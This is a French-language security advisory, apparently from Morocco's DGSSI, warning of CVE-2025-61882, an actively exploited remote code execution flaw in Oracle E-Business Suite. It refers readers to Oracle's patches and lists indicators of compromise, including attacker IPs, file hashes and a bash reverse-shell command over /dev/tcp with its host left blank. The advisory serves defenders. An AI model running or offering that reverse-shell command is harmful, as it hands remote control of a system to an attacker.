Vulnérabilité critique dans Oracle E-Business Suite

TitreVulnérabilité critique dans Oracle E-Business Suite
Numéro de Référence
57240610/25
Date de publication
06 octobre 2025
Niveau de Risque
Critique
Niveau d'Impact
Critique

Systèmes affectés:

  • Oracle E-Business Suite versions 12.2.3 et 12.2.14

Identificateurs externes:

  • CVE-2025-61882

Bilan de la vulnérabilité:

Oracle a publié un avis de sécurité pour corriger une vulnérabilité critique affectant Oracle E-Business Suite. La faille est exploitable à distance sans authentification via HTTP et peut conduire à une exécution de code à distance (RCE). Oracle confirme que cette faille est activement exploitable et  recommande d’appliquer immédiatement les correctifs de sécurité. 

Solution:

Veuillez se référer au bulletin de sécurité Oracle du 04 Octobre 2025 afin d’installer les nouvelles mises à jour.

Risque:

  • Exécution du code arbitraire à distance

Référence:

Bulletins de sécurité Oracle du 04 Octobre 2025: 

Indices de compromission:

Ip : 

  • 200.107.207.26

  • 185.181.60.11  

Commande: 

  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 

Hashs : 

  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 

  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b 

Brochure:

Vulnérabilité critique dans Oracle E-Business Suite.pdf

Pour signaler tout contenu numérique criminel, incluant atteinte à la sécurité des individus et des groupes, louanges ou incitations au terrorisme, et atteinte aux droits et libertés des enfants, utilisez la plateforme suivante : www.e-blagh.ma

DGSSI2025 All rights reserved